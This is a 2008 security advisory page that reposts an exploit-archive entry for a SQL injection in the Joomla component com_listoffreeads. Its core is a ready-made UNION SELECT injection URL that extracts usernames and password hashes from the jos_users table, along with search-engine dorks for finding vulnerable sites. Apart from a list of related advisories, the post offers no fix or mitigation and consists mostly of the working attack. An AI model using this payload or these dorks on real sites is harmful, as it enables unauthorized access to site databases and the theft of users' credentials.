Security Advisory: joomla SQL Injection(com_listoffreeads)

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals
  SmarterMail Enterprise 4.3 - malformed mail XSS
  WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability
  bugtraq@securityfocus
.com, vuln@secunia.com, packet@packetstormsec
urity.org

From: hackturkiye.hackturkiye_(at)_gmail.com <hackturkiye.hackturkiye_(at)_gmail.com>
Date: 20.02.2008
Subject: joomla SQL Injection(com_listoffreeads)

###############################################################
#
#   joomla SQL Injection(com_listoffreeads)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl :"com_listoffreeads"
#
# DORK 2 : allinurl:
#
################################################################
  EXPLOIT :

index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,
concat(username,0x3a,password)/**/from/**/jos_users/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN
################################################################